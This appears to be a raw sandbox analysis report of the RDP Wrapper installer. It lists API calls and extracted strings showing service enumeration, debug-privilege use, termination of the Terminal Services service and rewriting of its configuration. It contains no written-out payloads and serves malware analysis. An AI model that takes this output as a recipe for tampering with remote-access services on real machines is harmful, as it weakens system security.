                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastOpenService$CloseHandleManager
                                                                                                              • String ID: $sD$...$ServicesActive$[*] Checking $[-] OpenSCManager error (code $[-] OpenService error (code $[-] QueryServiceConfig error (code $[-] QueryServiceConfig failed.
                                                                                                              • API String ID: 48634454-3812534468
                                                                                                              APIs
                                                                                                                • Part of subcall function 0043C45C: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                                                • Part of subcall function 0043B7D4: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,0043BC5D,?,?,?,00447324,00000000,00000000,?,00443F06,00000000,00443FB2), ref: 0043B801
                                                                                                                • Part of subcall function 0043B7D4: GetLastError.KERNEL32(00000000,ServicesActive,00000005,00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B80C
                                                                                                                • Part of subcall function 0043B7D4: EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B8A2
                                                                                                                • Part of subcall function 0043B7D4: GetLastError.KERNEL32(00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8AF
                                                                                                                • Part of subcall function 0043B7D4: CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8BF
                                                                                                                • Part of subcall function 0043B7D4: CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B99F
                                                                                                                • Part of subcall function 0043BF00: GetCurrentProcess.KERNEL32(00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF3D
                                                                                                                • Part of subcall function 0043BF00: OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF43
                                                                                                                • Part of subcall function 0043BF00: GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF4C
                                                                                                                • Part of subcall function 0043C1C8: OpenProcess.KERNEL32(00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1CF
                                                                                                                • Part of subcall function 0043C1C8: GetLastError.KERNEL32(00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1DA
                                                                                                                • Part of subcall function 0043C1C8: TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000), ref: 0043C219
                                                                                                                • Part of subcall function 0043C1C8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C223
                                                                                                                • Part of subcall function 0043C1C8: GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C228
                                                                                                                • Part of subcall function 0043C1C8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C265
                                                                                                              • Sleep.KERNEL32(000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043F9CC
                                                                                                              • Sleep.KERNEL32(000001F4,000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043FA09
                                                                                                                • Part of subcall function 0043B58C: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
                                                                                                                • Part of subcall function 0043B58C: GetLastError.KERNEL32(?,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5F9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CloseHandleOpenProcess$ManagerServiceSleep$CurrentEnumEnvironmentExpandServicesStatusStringsTerminateToken
                                                                                                              • String ID: $sD$%d.%.2d.%.2d$SeDebugPrivilege$TermService$[*] Current update date: $[*] Everything is up to date.$[*] Latest update date: $[*] Terminating service...$[*] Your INI file is newer than public file. Are you a developer? :)$[+] New update is available, updating...$[+] Update completed.$[-] Failed to download latest INI from GitHub.$rdpwrap.ini
                                                                                                              • API String ID: 3534747103-2332903941
                                                                                                              APIs
                                                                                                                • Part of subcall function 0043C45C: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                                              • DeleteFileW.KERNEL32(00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0,000003E8), ref: 0043D985
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0,000003E8), ref: 0043D98E
                                                                                                              • DeleteFileW.KERNEL32(00000000,00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0), ref: 0043DA04
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0), ref: 0043DA0D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DeleteErrorFileLast$EnvironmentExpandStrings
                                                                                                              • String ID: $sD$[+] Removed file: $[+] Removed folder: $[-] DeleteFile error (code $[-] RemoveDirectory error (code $rdpwrap.ini
                                                                                                              • API String ID: 1427661212-4281953003
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041325C: VirtualQuery.KERNEL32(?,?,0000001C,00000000,00413408), ref: 0041328F
                                                                                                                • Part of subcall function 0041325C: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004132B3
                                                                                                                • Part of subcall function 0041325C: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004132CE
                                                                                                                • Part of subcall function 0041325C: LoadStringW.USER32(00000000,0000FFE5,?,00000100), ref: 00413369
                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,00413571), ref: 004134AD
                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134E0
                                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134F2
                                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134F8
                                                                                                              • GetStdHandle.KERNEL32(000000F4,0041358C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041350C
                                                                                                              • WriteFile.KERNEL32(00000000,000000F4,0041358C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 00413512
                                                                                                              • LoadStringW.USER32(00000000,0000FFE6,?,00000040), ref: 00413536
                                                                                                              • MessageBoxW.USER32(00000000,?,?,00002010), ref: 00413550
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                               • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                                                                              • String ID: $sD$(4A$LpD
                                                                                                              • API String ID: 135118572-2961882766
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00409F3F
                                                                                                              • GetLastError.KERNEL32(?), ref: 00409F4A
                                                                                                              • RaiseException.KERNEL32(C0FB007E,00000000,00000001,?), ref: 00409F80
                                                                                                              • EnterCriticalSection.KERNEL32(00449C1C), ref: 00409F92
                                                                                                              • FreeLibrary.KERNEL32(?,00449C1C), ref: 00409FAA
                                                                                                              • LeaveCriticalSection.KERNEL32(00449C1C,?,00449C1C), ref: 00409FB7
                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 0040A026
                                                                                                              • GetLastError.KERNEL32 ref: 0040A031
                                                                                                              • RaiseException.KERNEL32(C0FB007F,00000000,00000001,?), ref: 0040A067
                                                                                                                • Part of subcall function 00409D9C: LocalAlloc.KERNEL32(00000040,00000008), ref: 00409DA8
                                                                                                                • Part of subcall function 00409D9C: RaiseException.KERNEL32(C0FB0008,00000000,00000001,?,00000040,00000008), ref: 00409DBD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionRaise$CriticalErrorLastLibrarySection$AddressAllocEnterFreeLeaveLoadLocalProc
                                                                                                              • String ID: $
                                                                                                              • API String ID: 4255670546-3993045852
                                                                                                              APIs
                                                                                                              • MessageBoxA.USER32(00000000,?,004026E0,00002010), ref: 00403F39
                                                                                                              Similarity
                                                                                                              • API ID: Message
                                                                                                              • String ID: $$zD$$zD$7$D&@$l&@$zPD$&@
                                                                                                              • API String ID: 2030045667-2939321579
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(00000000,00415476,?,?,00000000,00000000), ref: 004151CE
                                                                                                                • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                              Similarity
                                                                                                              • API ID: Locale$InfoThread
                                                                                                              • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                              • API String ID: 4232894706-2493093252
                                                                                                              APIs
                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004198D5
                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004198F1
                                                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0041992A
                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004199A7
                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004199C0
                                                                                                              • VariantCopy.OLEAUT32(?), ref: 004199F5
                                                                                                              Similarity
                                                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                              • String ID:
                                                                                                              • API String ID: 351091851-3916222277
                                                                                                              APIs
                                                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                                              • GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                                              • WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00406208
                                                                                                              Similarity
                                                                                                              • API ID: FileHandleWrite$Message
                                                                                                              • String ID: Error$Runtime error at 00000000
                                                                                                              • API String ID: 1570097196-2970929446
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 00408D8D
                                                                                                              • GetProcAddress.KERNEL32(?,GetLongPathNameW), ref: 00408DA4
                                                                                                              • lstrcpynW.KERNEL32(?,?,?), ref: 00408DD4
                                                                                                              • lstrcpynW.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 00408E43
                                                                                                              Similarity
                                                                                                              • API ID: lstrcpyn$AddressHandleModuleProc
                                                                                                              • String ID: GetLongPathNameW$kernel32.dll
                                                                                                              • API String ID: 682285877-568771998
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(?,?,00447324,?,?,00443D51,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043CA09
                                                                                                              Strings
                                                                                                              • $sD, xrefs: 0043CA16
                                                                                                              • \SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C9F8
                                                                                                              • [-] OpenKey error (code , xrefs: 0043CA1B
                                                                                                              • %SystemRoot%\System32\termsrv.dll, xrefs: 0043CA53
                                                                                                              • ServiceDll, xrefs: 0043CA58
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast
                                                                                                              • String ID: $sD$%SystemRoot%\System32\termsrv.dll$ServiceDll$[-] OpenKey error (code $\SYSTEM\CurrentControlSet\Services\TermService\Parameters
                                                                                                              APIs
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4BC
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4D1
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandleService
                                                                                                              • String ID: error (code $$sD$[-]
                                                                                                              APIs
                                                                                                              • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E12C
                                                                                                              • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E1D4
                                                                                                              • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E1F9
                                                                                                              • CharNextW.USER32(00000000,?,?,00000000,0042E26E), ref: 0042E211
                                                                                                              Similarity
                                                                                                              • API ID: CharNext
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(?,00000000,00412F73,?,?,00000000), ref: 00412EF4
                                                                                                                • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                              • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F24
                                                                                                              • EnumCalendarInfoW.KERNEL32(Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F2F
                                                                                                              • GetThreadLocale.KERNEL32(00000000,00000003,Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F4D
                                                                                                              • EnumCalendarInfoW.KERNEL32(Function_00012E64,00000000,00000000,00000003,Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F58
                                                                                                              Similarity
                                                                                                              • API ID: Locale$InfoThread$CalendarEnum
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(?,00000000,004131C3,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412FCB
                                                                                                                • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                              Similarity
                                                                                                              • API ID: Locale$InfoThread
                                                                                                              • String ID: eeee$ggg$yyyy
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(00000000,00412E17,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412D20
                                                                                                              Similarity
                                                                                                              • API ID: LocaleThread
                                                                                                              • String ID: 0\D$`\D$|\D
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(00000000,00412E17,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412D20
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LocaleThread
                                                                                                              • String ID: 0\D$`\D$|\D
                                                                                                              • API String ID: 635194068-1443555069
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00411595), ref: 0041152C
                                                                                                              • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00411595), ref: 00411532
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DateFormatLocaleThread
                                                                                                              • String ID: $yyyy
                                                                                                              • API String ID: 3303714858-404527807
                                                                                                              APIs
                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                              • String ID: $sD$%ProgramFiles%$%ProgramW6432%
                                                                                                              • API String ID: 237503144-3145546840
                                                                                                              APIs
                                                                                                              • FindResourceW.KERNEL32(00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEC0
                                                                                                              • LoadResource.KERNEL32(00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AED7
                                                                                                              • LockResource.KERNEL32(00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEE8
                                                                                                                • Part of subcall function 00415A68: GetLastError.KERNEL32(0040AEF9,00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 00415A68
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Resource$ErrorFindLastLoadLock
                                                                                                              • String ID: CHARTABLE
                                                                                                              • API String ID: 1074440638-2668339182
                                                                                                              APIs
                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00419633
                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0041964F
                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004196C6
                                                                                                              • VariantClear.OLEAUT32(?), ref: 004196EF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                              • String ID:
                                                                                                              • API String ID: 920484758-0
                                                                                                              APIs
                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00413408), ref: 0041328F
                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004132B3
                                                                                                              • GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004132CE
                                                                                                              • LoadStringW.USER32(00000000,0000FFE5,?,00000100), ref: 00413369
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 3990497365-0
                                                                                                              APIs
                                                                                                              • GetThreadUILanguage.KERNEL32(?,00000000), ref: 00408B19
                                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 00408B7B
                                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 00408BD8
                                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 00408C0B
                                                                                                                • Part of subcall function 00408AC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,00408B89), ref: 00408ADB
                                                                                                                • Part of subcall function 00408AC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,00408B89), ref: 00408AF8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Thread$LanguagesPreferred$Language
                                                                                                              • String ID:
                                                                                                              • API String ID: 2255706666-0
                                                                                                              APIs
                                                                                                              • FindResourceW.KERNEL32(00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8,?,0044BFA8,00000000,?,0043CEE1), ref: 0042FB5F
                                                                                                              • LoadResource.KERNEL32(00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8,?,0044BFA8,00000000), ref: 0042FB79
                                                                                                              • SizeofResource.KERNEL32(00400000,0042FBE4,00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8), ref: 0042FB93
                                                                                                              • LockResource.KERNEL32(0042F774,00000000,00400000,0042FBE4,00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000), ref: 0042FB9D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                              • String ID:
                                                                                                              • API String ID: 3473537107-0
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(00449C1C), ref: 0040A0F8
                                                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 0040A10E
                                                                                                              • LeaveCriticalSection.KERNEL32(00449C1C,00449C1C), ref: 0040A143
                                                                                                              Strings
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeavelstrcmpi
                                                                                                              • String ID: YD
                                                                                                              • API String ID: 2420758022-4277794568
                                                                                                              APIs
                                                                                                              • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405A9A
                                                                                                              Strings
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                              • String ID: $$@
